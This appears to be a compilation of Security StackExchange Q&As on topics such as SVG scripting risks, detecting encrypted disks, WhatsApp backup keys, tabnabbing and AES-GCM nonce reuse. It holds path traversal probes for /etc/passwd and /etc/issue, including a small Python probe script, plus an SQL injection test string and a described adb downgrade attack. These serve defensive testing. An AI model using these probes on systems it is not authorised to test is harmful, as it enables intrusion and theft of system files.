XML-based vector graphic format, therefore it invokes the XML parser in the browser. Moreover, SVG has the <script> tag! Yes, you can embed javascript directly into SVG. This is not as dangerous as it sounds at first. Browsers that support SVG inside <img> tags do not support scripting inside that context. Ideally you should use SVG inside <embed> or <object> tags, where scripting is supported by browsers. Yet, do not do it for user-provided content! I would argue that allowing SVG inside <img src= may be dangerous: An XML parser is used to parse the SVG, whether it is inside the <img> or <object> tag. The parser is certainly tweaked with some parameters to ignore <script> tags in the <img> context. Yet, that is quite ugly; it is blacklisting a tag in a certain context, and blacklisting is poor security. <script> is not the only way to achieve execution context in SVG; there are also the onmouseover (and family) events present in SVG. This is again tricky to blacklist. The XML parser in browsers did suffer from problems in the past, notably with XML comments around script blocks. SVG may present similar problems. SVG has full support for XML namespaces. Ouch again. xlink:href is a completely valid construct in SVG, and the browser, inside the XML parser context, will likely follow it. Therefore yes, SVG opens several possible vectors to achieve execution context. Moreover, it is a relatively new technology and therefore not well hardened. I would not be surprised to see CVEs on SVG handling. For example, ImageMagick had problems with SVG .
{ "source": [ "https://security.stackexchange.com/questions/135513", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123045/" ] }
135,834
Is it possible to tell if a hard drive is encrypted, regardless of what software was used, i.e., Truecrypt / VeraCrypt / Bitlocker for AES-256? Just the other day, I thought it could be possible to tell if I scan the drive with "Sector View" to read the data. If the data is filled with randomness then that means that it is encrypted. Is it that easy to tell?
We have two types of encryption here: "file based encryption" and "full disk encryption". There are documented forensics methods and software (e.g. EnCase) that help us detect the schemes and programs used to encrypt the disk. I'm going to take a list of popular tools and standards and see if they leave any traces with which we can determine that they've been used. Bitlocker: Bitlocker is a full disk encryption standard available on the Windows operating system from Windows 7 onwards; this tool uses AES (128- or 256-bit keys) to encrypt the disk. A disk encrypted by Bitlocker is different from a normal NTFS disk. The signature " -FVE-FS- " can be found at the beginning of Bitlocker-encrypted volumes. These volumes can also be identified by a GUID: for BitLocker: 4967d63b-2e29-4ad8-8399-f6a339e3d00 ; for BitLocker ToGo: 4967d63b-2e29-4ad8-8399-f6a339e3d01 . DiskCryptor/TrueCrypt/VeraCrypt: DiskCryptor is based on TrueCrypt. For both DiskCryptor and TrueCrypt we can detect their presence with the following criteria: the size of the file or collection of clusters is a multiple of 512; the minimum size of the object is 19 KB, although by default it is at least 5 MB; it contains no specific file signature throughout the entire object; and it has a high Shannon entropy or passes a Chi-squared distribution test. Note that since there's no specific signature or header left behind, we can't tell for sure that TrueCrypt (or its siblings) was used; by combining several methods we can try to make a better guess about its presence. FileVault: FileVault is Bitlocker's equivalent on Mac and offers full disk encryption. The signature " encrcdsa " (hex value " 65 6E 63 72 63 64 73 61 ") can be found at the beginning of FileVault-encrypted volumes. cryptsetup with LUKS: Linux Unified Key Setup is a disk encryption specification and can be used in cryptsetup on Linux, which is a common tool for storage media volume encryption. It is optional and users can choose not to use this format, but if used we can detect its presence with the " LUKS\xba\xbe " signature at the beginning of the volumes. Check Point Full Disk Encryption: at sector offset 90 of the VBR, the product identifier " Protect " can be found (hex value " 50 72 6F 74 65 63 74 "). GuardianEdge Encryption Plus/Anywhere/Hard Disk Encryption and Symantec Endpoint Encryption: at sector offset 6 of the MBR, the product identifier " PCGM " can be found (hex value " 50 43 47 4D "). McAfee Safeboot/Endpoint Encryption: at sector offset 3 of the MBR, the product identifier " Safeboot " can be found (hex value " 53 61 66 65 42 6F 6F 74 "). Sophos Safeguard Enterprise and Safeguard Easy: for Safeguard Enterprise, at sector offset 119 of the MBR, the product identifier " SGM400 " can be found (hex value " 53 47 4D 34 30 30 3A "). Symantec PGP Whole Disk Encryption: at sector offset 3 of the MBR, the product identifier " ëH|PGPGUARD " can be found (hex value " EB 48 90 50 47 50 47 55 41 52 44 "). Measuring file randomness to detect encryption: the methods discussed earlier may not be feasible for every disk/file encryption scheme, since not all of them have specific properties that we can exploit to detect them. One other method is to measure the randomness of files: the closer they are to random, the more certain we are that encryption is used. To do this we can use a Python script named file_entropy.py . The closer the entropy value is to 8.0, the higher the entropy. We can extend this further and draw plots to visualize the distribution of bytes (see calculate-file-entropy). One other pointer to detect encryption is that no known file signature will be spotted in the volume (no jpg, no office documents, no known file types). And since compression methods (e.g. gzip , rar and zip ) have known signatures, we can differentiate them from encryption for the most part. To sum up: use known signatures to detect encryption (if possible); use special characteristics (minimum file size, high entropy, absence of any special file signature, etc.) to detect encryption; and rule out compressed files using their signatures. So going back to the main question, " Is it that easy to tell? ": this falls under forensics methods, and we may be dealing with steganography techniques. In a normal case where the user isn't trying to fool us, it is somewhat easy to tell that encryption is in place, but in real-world scenarios where users may try to hide things and deceive us, they may just pipe /dev/urandom to a file! It's not gonna be easy.
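The entropy test mentioned above fits in a few lines of Python; a minimal sketch (file names are placeholders, not from the original answer):

import math
from collections import Counter

def shannon_entropy(path):
    data = open(path, "rb").read()
    counts = Counter(data)
    return -sum((c / len(data)) * math.log2(c / len(data)) for c in counts.values())

# shannon_entropy("suspect.img") close to 8.0 suggests encryption or compression;
# plain English text typically lands around 4 to 5 bits per byte.

Since compressed formats also score near 8.0, the entropy result has to be combined with the signature checks above before concluding that a volume is encrypted.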
{ "source": [ "https://security.stackexchange.com/questions/135834", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31093/" ] }
135,884
I would like to know why is it considered to be dangerous to open an email from an unknown source? I am using Gmail and I thought it's only unsafe to download an attachment and run it. The first thing that came into my mind was what if the email text contains XSS JavaScript code but I am sure that every email provider has protected their site from getting XSS-ed . What is going on behind the scenes when you get infected just by clicking on email and reading its content, for example on Gmail?
There is a small risk of an unknown bug — or a known but unpatched one — in your mail client allowing an attack by just viewing a message. I think, though, that this very broad advice is also given as a defense against some types of phishing scams . Social engineering attacks are common and can lead to serious trouble. Making sure people are at least suspicious is a first line of defense. It is like telling an elderly grandparent to never give their credit card info over the phone — okay, sure, there are plenty of circumstances where doing that is relatively safe, but when they keep getting scammed over and over, it's easier to just say: don't do it. Likewise, not opening mail keeps you from reading about the plight of an orphan in a war-torn region who has unexpectedly found a cache of Nazi gold and just needs $500 to smuggle it out and they'll share half with you, and your heart just goes out, and also that money wouldn't hurt.... Or, while you know the rule about attachments, this one says that it's pictures of the cutest kittens ever, and how can that be harmful — I'll just click it and okay now there are these boxes saying do I want to allow it, which is annoying because of course I do because I want to see the kittens....
{ "source": [ "https://security.stackexchange.com/questions/135884", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123105/" ] }
135,907
We work in an organisation which is supposed to be HIPAA compliant. Security is a big concern for us. We've been tasked to find out if any user is using anonymous proxy in the network. Is there a way we can find if Tor is being used inside our corporate network domain? We're using Symantec client protection. VPN is provided using Cisco.
You can use a list of Tor (uplink) nodes, add this to the outgoing firewall, set up a task to update it once a day, and you'll be good. But Tor can also be used over an HTTP(S) proxy, so you will have to detect proxies as well. I am not sure this is going to help you secure anything. As long as there is a connection to the internet, it will be possible to bypass these kinds of security measures. You could end up spending endless time and energy prohibiting all kinds of proxies, VPNs, SSL tunnels and such. The advice is to just make sure they cannot do any harm by protecting what's important to your business, and leave users be. For example, separate the network into compartments, use subnets, VLANs and DMZs, and require authentication and authorization on private networks. Keep the important stuff in one zone, while allowing networking without restrictions in another. And so on...
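A minimal Python sketch of the list-matching approach (the URL is believed to be the Tor Project's published bulk exit list; verify it before relying on it, and note that detecting outbound Tor use from inside the network really needs the full relay list, since clients connect to entry guards rather than exit nodes):

import urllib.request

EXIT_LIST_URL = "https://check.torproject.org/torbulkexitlist"  # assumed URL, verify before use

def load_tor_exit_nodes():
    with urllib.request.urlopen(EXIT_LIST_URL) as resp:
        return {line.strip() for line in resp.read().decode().splitlines() if line.strip()}

tor_exits = load_tor_exit_nodes()
for ip in ["198.51.100.23", "203.0.113.99"]:  # placeholder addresses from firewall or proxy logs
    if ip in tor_exits:
        print(ip, "matches a known Tor exit node")

Feeding such a list into the outgoing firewall and refreshing it daily, as suggested above, automates the same check.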
{ "source": [ "https://security.stackexchange.com/questions/135907", "https://security.stackexchange.com", "https://security.stackexchange.com/users/46219/" ] }
136,020
I found that this guy uploaded some face recognition code with a comment that he'd like to use it "as a security feature". This got me thinking; is face recognition a valid security feature, or is it "cool", but not very effective way to secure something?
No, not really. At least not as primary form of authentication. Biometrics in general are not good for authentication, because: You leave them all over the place, and there is no way to avoid that. They cannot be changed in case of a breach. You need to add a high error tolerance as to not cause usability problems. These tolerances lead to false positives, even without attacks, and make attacks possible. In practice, when implementing the algorithms, they usually have to balance between [false acceptance rate] and [false rejection rate]. This makes the efficiency of face recognition the lowest of all regarding the table. Its security is also lower than other biometric recognition system, especially compared to fingerprint scan. — Your face is NOT your password, Face Authentication ByPassing Lenovo – Asus – Toshiba (2009) I couldn't find a live demonstration for that paper, but here is one from a 31C3 talk about biometrics , which uses a simple picture, and can bypass required blinking. Here is an article from a person using a video to bypass a blinking requirement. Here is a more recent paper using more modern approaches: In this paper, we introduce a novel approach to bypass modern face authentication systems. More specifically, by leveraging a handful of pictures of the target user taken from social media, we show how to create realistic, textured, 3D facial models that undermine the security of widely used face authentication solutions. [...] In our opinion, it is highly unlikely that robust facial authentication systems will be able to operate using solely web/mobile camera input. Given the widespread nature of high-resolution personal online photos, today’s adversaries have a goldmine of information at their disposal for synthetically creating fake face data. Moreover, even if a system is able to robustly de- tect a certain type of attack - be it using a paper printout, a 3D-printed mask, or our proposed method - generalizing to all possible attacks will increase the possibility of false rejections and therefore limit the overall usability of the system. — Virtual U: Defeating Face Liveness Detection by Building Virtual Models from Your Public Photos (2016)
{ "source": [ "https://security.stackexchange.com/questions/136020", "https://security.stackexchange.com", "https://security.stackexchange.com/users/84365/" ] }
136,031
I need to be able to communicate with a REST API Service and store the username/password pair in a database. The client talks to the API from a server within our DMZ, but gets the credentials from a database outside of the DMZ within the network. I would like to be able to make this more secure so that if the server was compromised it would be difficult to access the credentials. What is the best approach for storing the credentials securely? I can't use a salt & hashing mechanism because the API demands the username/password pair as plain-text and they control the authentication process. Platform and languages in use: Windows/.NET/C#
{ "source": [ "https://security.stackexchange.com/questions/136031", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123557/" ] }
136,038
I'm pen testing an application. The URL is basically app.php?app=appname . If app exists it gives correct output, but if it doesn't exist we get a internal server error 500. Vega detects it as a SQL injection vulnerability, but when I test it with sqlmap it cannot find injection in this url. Vega shows the URL app.php?app=appname'%20AND%201=2%20--%20 , but it also gives the same internal error. In this case is it really a SQL injection vulnerability? Can I force sqlmap to use this URL as a help?
{ "source": [ "https://security.stackexchange.com/questions/136038", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83056/" ] }
136,072
This is all not about their end-to-end transmission protocol and my question is mostly Android-centric. What I ask myself: When reading about hacking and decrypting local WhatsApp database backups it is mentioned that a private key in a restricted app area is needed from Android. If you don't have a rooted phone you normally should not have access to this key. The backup files (file extension crypt5-12) are normally useless without this key. When you switch phones (e.g. buying a new one) you can copy your local sdcard/WhatsApp folder to the new phone and WhatsApp can decrypt that backup if the same number is used: source is here https://www.whatsapp.com/faq/en/android/20887921#restore First assumption: The backup key is saved on WhatsApp servers too. Otherwise a local phone-to-phone backup would not work? Second assumption: So the worst part is that if you back up to Google Drive, WhatsApp theoretically has access (?) to your (hopefully encrypted) backup and also access to the en-/decryption key on their servers. Or is there at least a separation between Google Drive not readable by WhatsApp itself? Does somebody have more details? One last word about the end-to-end encryption protocol: It seems it is useless (not against normal hackers, but I think against US surveillance) when at least one of your friends does a Google Drive backup of their chat (the chat history is then retrievable).
First assumption: The backup key is saved on WhatsApp servers too. Otherwise a local phone-to-phone backup would not work? TL;DR: Yes, after some investigation, this seems to be the case. Secondary devices The protocol is quite complicated and not limited to WhatsApp, but works generally like this: The phone that runs the chat app is called the first device. This device is the almighty device storing all sensitive data like private identity keys, connection passwords, local encryption keys, attachment encryption keys etc. All other devices are called second devices; this includes WhatsApp web and desktop clients. These clients are essentially dumb. Whenever a new device appears it needs to be authenticated via the first device first. WhatsApp does this using an initial QR-code (other apps use SMS tokens), and then via a set of proofs. Eventually the first device decides if a secondary device is allowed control over the sensitive data. If so, the second device receives these keys on request. With these keys the second device can download the contact file and decrypt it using the requested key. The same works for all media messages. A WhatsApp-specific note: these key requests are very short-lived, and thus secondary clients are required to regularly ask the first device for a new key to access the data. This causes the annoying 'Phone not connected' alert in WhatsApp web. Whenever you install WhatsApp on a new phone, this entire process will take place and the first device will authorize the new phone and immediately lock out one of the two active instances. You then have to choose one of the phones. If you choose the new phone, ownership of all secrets will be transferred to the second device, which then becomes the first device, completing the circle. Backups After some investigation, decompiling of the app and running test scenarios, we can conclude the following: The app is using several local (SQLite) databases. Messages are stored in these databases unencrypted, and the databases themselves are not encrypted either. You can check this yourself by downloading the .db files from the data/ folder. This is the default storage location for WhatsApp in running mode, and is unencrypted for performance reasons most likely. Normal apps should not be able to access the .db files in the data folder, but there are quite a few adb workarounds. Database files including settings and messages are backed up to Google Drive (if you choose to do so). The app can request a lock on the folder in Google Drive to prevent users from downloading or accessing the backup. The message databases sent to the remote backup location are the msgstore.db.crypt[0-12] files, where the last number denotes the protocol version. The databases are encrypted with a key stored in the data folder. This key is in fact stored on the WhatsApp server. Second assumption: So the worst part is that if you back up to Google Drive, WhatsApp theoretically has access (?) to your (hopefully encrypted) backup and also access to the en-/decryption key on their servers. Or is there at least a separation between Google Drive not readable by WhatsApp itself? Does somebody have more details? The moment you install a new device and set up your Google Account, the files can be requested by the app and configured on the local device. This includes the axolotl database containing the identity key which is necessary in order to prove your identity to others.
The decryption key is retrieved after proving ownership of the phone number (username) to the newly installed WhatsApp instance. In theory, WhatsApp should not be able to access those files, but only you and Google. Of course, WhatsApp could download the files and send them to another location. But at some point we need to put trust in the app, especially if it's not open source. WhatsApp is making local backups as well, usually twice a day in sdcard/whatsapp. These local backups also contain the identity key and the message storage databases, and are in fact encrypted. Once again the encryption key is stored on the remote server together with your WhatsApp profile. This explains why you can move the entire WhatsApp backup folder from one device to another. Without a verified phone number you cannot read the backup files, or use the identity key; however, any rooted device can give easy access to the original, unencrypted, database files. One last word about the end-to-end encryption protocol: It seems it is useless (not against normal hackers, but I think against US surveillance) when at least one of your friends does a Google Drive backup of their chat (the chat history is then retrievable). The story does not get any better from this point, as we know that Google and other companies such as Facebook and WhatsApp supply files on request under the FISA Act. There is no need to strike at the end-to-end communication as there is already a 'backdoor'. E2E only protects against active adversaries on the communication channel, who do not possess the power to demand backup files from party one and the decryption key from the other. Window of Attack Suppose we look at the situation from a non-government or 'normal' attacker with limited resources; then the device is the obvious weakness. Any app with root privileges can also access databases, can copy keys and so forth. The default Android ROMs contain many apps running under the system user, but also the vendor's apps shipped with the ROM (and updates) are protected from user intervention, and thus run as system. Malicious apps are not without risk either. With the correct permissions they have full control over the sdcard storage, and can access the encrypted backups. When the verification SMS is intercepted at the correct moment (hooking in on the SMS receive call) and the phone number is copied, it should be possible to activate a self-controlled WhatsApp instance and to receive the database decryption key. The attack becomes even more plausible if the adversary has control over mobile communications (which governments often do). The adb attack is even worse since it doesn't require root permissions. Basically a downgrade attack is possible where an older version of WhatsApp is installed via the bridge interface. This so-called legacy WhatsApp can be tricked into a full application backup, resulting in a tar archive. The tarball is pulled to the adb server side and extracted. When properly prepared it would take a USB cable and a matter of seconds.
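If you want to check the claim about the runtime databases being plain SQLite yourself, a minimal Python sketch like the following works. The file name is a placeholder for a msgstore.db copied from a rooted test device, and no table names are assumed, because WhatsApp's schema changes between versions; the point is simply that an unencrypted SQLite file opens and lists its tables, whereas an encrypted one would not.

import sqlite3

DB_PATH = "msgstore.db"  # hypothetical local copy pulled from a rooted test device

conn = sqlite3.connect(DB_PATH)
cur = conn.cursor()

# Enumerate whatever tables the file actually contains; an encrypted file
# would fail here with "file is not a database".
cur.execute("SELECT name FROM sqlite_master WHERE type = 'table'")
for (table_name,) in cur.fetchall():
    row_count = cur.execute(f"SELECT COUNT(*) FROM {table_name}").fetchone()[0]
    print(f"{table_name}: {row_count} rows")

conn.close()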
{ "source": [ "https://security.stackexchange.com/questions/136072", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4159/" ] }
136,116
I was working with this web app when someone pen-tested it and sent me a huge report that says my app is vulnerable to a directory traversal attack. Here is one sample: Testing Path: http://127.0.0.1:80/??/etc/issue <- VULNERABLE! I put http://127.0.0.1:80/??/etc/issue in my browser, but it gave me the home page; it didn't at all return the /etc/issue file. Then I tried with curl and it too returned the homepage. Could somebody please explain to me how my app is vulnerable, if the /etc/issue file is not returned? The app is coded in Python 2.7, with Flask as the framework and Nginx as a reverse proxy. Two more samples from the report, along with the corresponding responses:
Testing Path: http://127.0.0.1:80/??/etc/passwd <- VULNERABLE!
GET Request - app: 0|req: 1587/1587] 127.0.0.1 () {34 vars in 488 bytes} [Tue Sep 6 15:47:13 2016] GET /??/etc/passwd => generated 982 bytes in 4 msecs (HTTP/1.1 200) 2 headers in 80 bytes
Testing Path: http://127.0.0.1:80/??/??/etc/passwd <- VULNERABLE!
GET Request - app: 0|req: 1591/1591] 127.0.0.1 () {34 vars in 493 bytes} [Tue Sep 6 15:47:14 2016] GET /??/??/etc/passwd => generated 982 bytes in 5 msecs (HTTP/1.1 200) 2 headers in 80 bytes
I sent a report for a similar vulnerability recently and got a similar response. Turns out most browsers and CLI HTTP clients remove path traversal components from the URL. For instance, if in Firefox you type the URL http://example.com/../../../etc/passwd the GET request that arrives at example.com will look like this:
GET /etc/passwd HTTP/1.1
[Omitted headers]
Same deal with wget. You should try with a lower-level tool, like telnet or netcat:
$ telnet example.com 80
GET /../../../etc/issue HTTP/1.1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 349
Connection: close
Date: Wed, 07 Sep 2016 12:38:13 GMT
Server: ECSF (fll/078B)
Then again, it might have been a false positive; your auditor should've included the contents of /etc/issue in the report. That's kind of the point of using issue and not passwd. You should at least follow up with your auditor to confirm whether it was a false positive. If that's not possible, arrange a new pentest or perform your own with a path traversal fuzzer like dotdotpwn. Never assume you're secure, ensure you are. Especially after a report like that.
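If you want to reproduce exactly what the scanner sent, without the client rewriting the path first, a few lines of Python will also do it; the standard http.client module passes the request path through untouched (host, port and payload list below are placeholders for your own test target, and newer curl versions have a --path-as-is option for the same purpose):

import http.client

HOST, PORT = "127.0.0.1", 80
payloads = ["/??/etc/passwd", "/../../../etc/issue", "/%2e%2e/%2e%2e/%2e%2e/etc/passwd"]

for path in payloads:
    conn = http.client.HTTPConnection(HOST, PORT, timeout=5)
    conn.request("GET", path)           # sent verbatim, no dot-segment squashing
    resp = conn.getresponse()
    body = resp.read()
    print(f"{path!r} -> HTTP {resp.status}, {len(body)} bytes")
    # A real traversal hit would return the target file instead of your normal page.
    if b"root:" in body:
        print(body.decode(errors="replace"))
    conn.close()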
{ "source": [ "https://security.stackexchange.com/questions/136116", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123651/" ] }
136,227
Wikipedia is not very explicit on this, The exploit employs scripts to rewrite a page of average interest with an impersonation of a well-known website, when left unattended for some time. What is 'tabnabbing', how does one do it?
Tabnabbing is a phishing technique where a malicious web site changes its looks while the tab is inactive in order to trick the user into entering credentials. This page is simultaneously a description and a demo. When you visit it, it shows a description of what tabnabbing is. When you then click another tab, it changes the tab's favicon and title to look like Gmail. Later, when the user wants to read her mail, she goes to this tab thinking it is Gmail and enters her credentials. Edit: In this animation, you see that while I am reading SE, the tab that at first looked harmless changes in the background to look like Gmail. This way the page tries to trick me into submitting my credentials.
{ "source": [ "https://security.stackexchange.com/questions/136227", "https://security.stackexchange.com", "https://security.stackexchange.com/users/68638/" ] }
136,230
My friend's country is quickly moving toward dictatorship. Currently, I am not in that country, but when I try to talk to my friends, they are afraid of talking to me via WhatsApp or Skype because, without any logical reason, people are sent to prison and they are afraid that their (written or verbal) conversations are being eavesdropped on by the government. When it comes to my question: is it so easy for a country to eavesdrop on conversations on the internet (all the internet service providers in the country are under their control), or is it just a conspiracy theory to terrify the people?
{ "source": [ "https://security.stackexchange.com/questions/136230", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123766/" ] }
136,379
Our client has come up with the requirement that in case the username in question has had multiple failed login attempts, the incorrectly entered password(s) must be shown once a successful login is performed. Correctly entered information, including previous passwords, will not be shown in any case. Our lead dev has told us it is technically possible by not hashing incorrect entries, but she is extremely uncomfortable with the feature and thus it has been put on hold while we brainstorm it out. The website in question is a broad mapping/GIS application that does not feature any monetary transactions whatsoever. Other login/authentication options include Google/LinkedIn/Twitter/facebook, so obviously no passwords to be stored there and handling that is primarily a UX issue. What security vulnerabilities come with implementing such a feature? Our client is not entirely without technical knowledge so a general explanation is enough. My apologies if the question is too broad or the answer very obvious.
The primary issue is that incorrect passwords have to be stored in a way that allows them to be later displayed to users. Which, as your dev pointed out, means they can't be cryptographically hashed first. The result is that you store them either as plaintext (bad) or encrypted (better but not normally recommended). The biggest risk is if this database of invalid passwords becomes accessible to attackers. Either they compromise the server, perform SQL injection, or retrieve it in some other way. Rather than cracking the primary passwords, which hopefully are strongly hashed and therefore tougher targets, they could decide to compromise accounts using the information in the invalid password history. Either they access the plaintext passwords easily, or they attempt to find the encryption key that allows them to decrypt back to plaintext passwords. A common source of login failures is minor typos during the password entry process. So my password is Muffins16 but I type in mUFFINS16 because my caps lock is on. Or Muffins166 because I hit the same key twice. Or Muffina16 because my finger hit the wrong key. As you can see these variations are close enough to the original that attackers can probably determine the valid password from invalid passwords by trying a few minor alterations or comparing wrong passwords to likely dictionary words or names. This problem is exacerbated because most people use password choices similar to these formats and not random strings. It is harder for an attacker to identify the typo if your invalid password is V8Az$p4/fA, although still much easier to try variations of that than to guess it without any info. Another risk is that users may not remember which of their passwords they used on this site so they try their common ones. Now this site is suddenly a bigger target because an attacker might be able to not only compromise a user's account there but also on other sites with the handy list of 'invalid' passwords. You can mitigate some of these risks by wiping storage of invalid passwords immediately after display following a valid login. That should limit the window of opportunity for an attacker to access and benefit from the data. The question you should probably ask your client is how they predict users will benefit from seeing their invalid passwords. Is it so users can identify how they mistyped their password? Typos aren't intentional so it's not likely that showing them their mistake will improve future login attempts. So users can identify an attacker trying to guess their passwords? Similar feedback can be provided by listing date, time, IP/geolocation or other info for invalid attempts without the attempted password. So users know that they screwed up during password entry and don't blame the site's login system? This seems like the only one with merit and I'm not sure it provides enough value to justify the risk. My guess is that once you better understand what they're trying to accomplish with this feature you can probably suggest more secure alternatives.
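To make the typo point concrete, here is a small illustrative sketch; the helper and its rules are made up for illustration (real cracking rulesets, e.g. in hashcat or John, are far richer), but even these trivial rules show how few guesses an attacker needs once they hold a single leaked 'invalid' attempt:

import string

def candidate_passwords(leaked_attempt: str) -> set:
    """Obvious corrections of a leaked *failed* password attempt (illustrative only)."""
    cands = set()
    cands.add(leaked_attempt.swapcase())                        # caps lock was on: mUFFINS16 -> Muffins16
    for i in range(len(leaked_attempt)):
        cands.add(leaked_attempt[:i] + leaked_attempt[i + 1:])  # a key hit twice: Muffins166 -> Muffins16
        for c in string.ascii_letters + string.digits:
            cands.add(leaked_attempt[:i] + c + leaked_attempt[i + 1:])  # one wrong key: Muffina16 -> Muffins16
    cands.discard(leaked_attempt)
    return cands

guesses = candidate_passwords("mUFFINS16")
print(len(guesses), "candidates to try")   # a few hundred, not billions
print("Muffins16" in guesses)              # True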
{ "source": [ "https://security.stackexchange.com/questions/136379", "https://security.stackexchange.com", "https://security.stackexchange.com/users/109044/" ] }
136,543
I am moving to Germany, and in the contract I signed I had to accept that all my data traffic can/will be checked by the apartment owner. The contract states: Flatrate, aber hinter 30GB Tarif priorisiert, aslo etwas langsamer Ja ich weiss, daß meine Daten überprüft werden. Which translates to: flat rate, but deprioritized behind the 30GB tariff, so somewhat slower after that amount of data. And the critical: Yes, I know that my data is checked/investigated. Later in the contract one can read the following: Im Rahmen der gesetzlichen Bestimmungen (Anti-Terror-Gesetze und TKG) kann das Protokollieren der Daten erfolgen. Im Mietpreis ist eine FLAT-Rate enthalten, dabei können jedoch einzelne Ports gesperrt sein oder bestimmte Verbindungen mittels Traffic-Shapping bevorzugt oder verlangsamt werden. Bestimmte Geschwindigkeiten werden nicht zugesichert. Die Verbindung funktioniert nur, wenn DHCP eingeschaltet ist (z.B. bei Windows IP-adresse automatisch beziehen). Which translates to: Within the framework of the statutory provisions (anti-terror laws and the TKG), the data may be logged. A flat rate is included in the rent, but individual ports may be blocked and certain connections may be prioritized or slowed down by traffic shaping. No particular speeds are guaranteed. The connection only works if DHCP is enabled (e.g. in Windows, "obtain IP address automatically"). Since I really needed this apartment I was forced to accept this. But nowhere does the contract say that I cannot make it difficult for the landlord to check my traffic. So my question is: would it be possible to make it difficult for the person watching my data traffic to see what I am actually doing on the internet? As you probably can tell, I do not know a lot in this field. Internet is provided via LAN, but I am going to use a D-Link DIR-635 router. And I am running Linux Mint. I am not familiar with the prices of 4G/LTE in Germany, so I cannot say if that is an option yet. I do not think I can get my own internet installed, and since the internet is provided in the rent (whether I want it to or not) it feels redundant to install a personal internet connection.
FINAL (hopefully) UPDATE: Well after all the very interesting and valuable discussion, it seems to me as though initial thoughts were correct. From the updated question, I would say that the restrictions are pretty standard for Germany. My recommendation is that you ignore the noise and the concerns and simply make use of the service. Unless you have some very specific security needs that you haven't shared, using HTTPS wherever possible (which is best practice anyway) is sufficient. In any case, the other options discussed would all add overheads to your traffic which would use up your 30GB even sooner and slow things down. There are several things you can do, provided that the terms and conditions of use are OK with them. You don't say what country you are in but you might want to get the terms of use checked by a lawyer since some terms may not be legally permissible anyway. Here are four of the main ways you can protect your Internet traffic from the prying intermediate. Make sure you always only connect to HTTPS sites When you use HTTPS sites, the traffic is encrypted between you and the endpoint. Your landlord's infrastructure will not be able to do more than examine the destination IP address, port and DNS. In particular, things like banking and health sites will remain secure. Use a VPN A VPN in this case is a 3rd party service that encrypts ALL of the traffic (not just web traffic as in 1) between your machine and the VPN host. This prevents any inspection of the traffic at all and it will appear as though you only talk to the VPN destination. Unfortunately, it is possible that common VPN endpoints might be blocked or even a smart security system used that will dynamically identify VPN traffic and ban it. Check the terms of use from your landlord carefully. Tor Tor is a way to obfuscate connections across the Internet and is often associated with "the dark web". However, it has legitimate uses as well. Unfortunately, it can add quite an overhead to traffic and may be unacceptably slow. Typically Tor will be used for web browsing; other network traffic would not be affected. Use the Mobile network If you are fortunate enough to live in an area with a) good (4G/LTE) mobile coverage and b) an affordable data tariff, then using a 4G/LTE mobile router may be an option. You can get some staggeringly good data rates. Don't expect to be free of restrictions though. Many tariffs don't allow device sharing; you'll need a special tariff for mobile data. You might not be allowed to use all services (like VPNs) and you are more likely to have national-level restrictions applied such as the UK's national "firewall". It goes without saying (so I will say it anyway!) that you should ensure that you are staying within the letter of the laws of your locality & the legitimate terms of use of the landlord's network. However, none of the above are illegal in most countries (well in most Western countries anyway) as long as you are not using them to do illegal activities. Tor and VPNs may possibly be illegal or at least get you unwelcome attention in certain countries. UPDATE: Without question, the most security would be provided by a VPN. However, that will only be useful if the landlord's network allows VPN traffic. In addition, VPNs also carry an overhead so things like real-time traffic (Skype voice/video for example) and online gaming would be impacted quite significantly. In addition, VPNs will normally come at a cost though there are some discount codes around that might help.
It is possible to set up your own VPN if you have a server on the Internet to run it on. Most VPS hosts won't allow it but some will as long as you keep it private. The real question is: do you really need to be bothered? That's why I mentioned HTTPS first. Since this protects your information on its way to sites, and since all decent online services already use HTTPS, you might find that this is a storm in a teacup. UPDATE 2: As some others have pointed out, there are many flavours of VPN. A commercial service will be the easiest to consume but you need to do your homework to find the best for your region. Commercial VPNs can also be relatively easily blocked both by endpoint and by traffic inspection. Some VPNs require specific ports to be open on the network and these might not be available. Test before you buy. In general, those offering SSL-based or OpenVPN-based services are likely to offer more options and be easier to get through any blocks. Another form of VPN is to use an SSH client such as PuTTY (for Windows) connected to an SSH server (perhaps on your own or a friend's VPS). You can throw in a local SOCKS proxy client and then you will have a very configurable private VPN service. Not especially easy to set up though if you don't understand the terminology. Note that many VPS services ban their use for even private VPNs. Another thing to note is that there are several ways for security infrastructure to spot VPN traffic and therefore block it. Known endpoints for commercial services and known ports for VPN types are the easiest, but it is possible to examine traffic patterns and work out that even apparent SSL traffic (e.g. if using port 443 for VPN) isn't actually SSL.
{ "source": [ "https://security.stackexchange.com/questions/136543", "https://security.stackexchange.com", "https://security.stackexchange.com/users/114327/" ] }
136,739
If I use AES-GCM and encrypt data with a 128-bit key and always use the same nonce, is using the same nonce a security risk? Can a hacker guess the key? Or is the nonce only there to verify that the message was not corrupted? Especially if I encrypt/store small amounts of text like in a dictionary: a aa b bb c cc ... Thanks
When using AES-GCM, using the same nonce and key pair for multiple messages is catastrophic. You lose all of the security guarantees AES-GCM is supposed to provide. This is the worst possible scenario you could create. It is critical when using AES-GCM that the nonce is never repeated for any given key. The best way to ensure this is to use a cryptographically strong PRNG to generate a new 96-bit nonce for each message, and to re-key at reasonably regular intervals, where "reasonably regular" is defined by how much data and how many messages you're encrypting.
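If it helps, here is a minimal sketch of the intended usage pattern, assuming the third-party pyca/cryptography package; the nonce-plus-ciphertext layout is just an illustrative convention, not a fixed format. The nonce is not secret and travels with the message; it just must never repeat under the same key.

import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=128)
aead = AESGCM(key)

def encrypt(plaintext: bytes, associated_data: bytes = b"") -> bytes:
    nonce = os.urandom(12)                       # fresh random 96-bit nonce per message
    return nonce + aead.encrypt(nonce, plaintext, associated_data)

def decrypt(blob: bytes, associated_data: bytes = b"") -> bytes:
    nonce, ciphertext = blob[:12], blob[12:]
    return aead.decrypt(nonce, ciphertext, associated_data)   # raises InvalidTag on tampering

token = encrypt(b"aa")
print(decrypt(token))            # b'aa'
print(encrypt(b"aa") != token)   # True: same plaintext, different ciphertext every time

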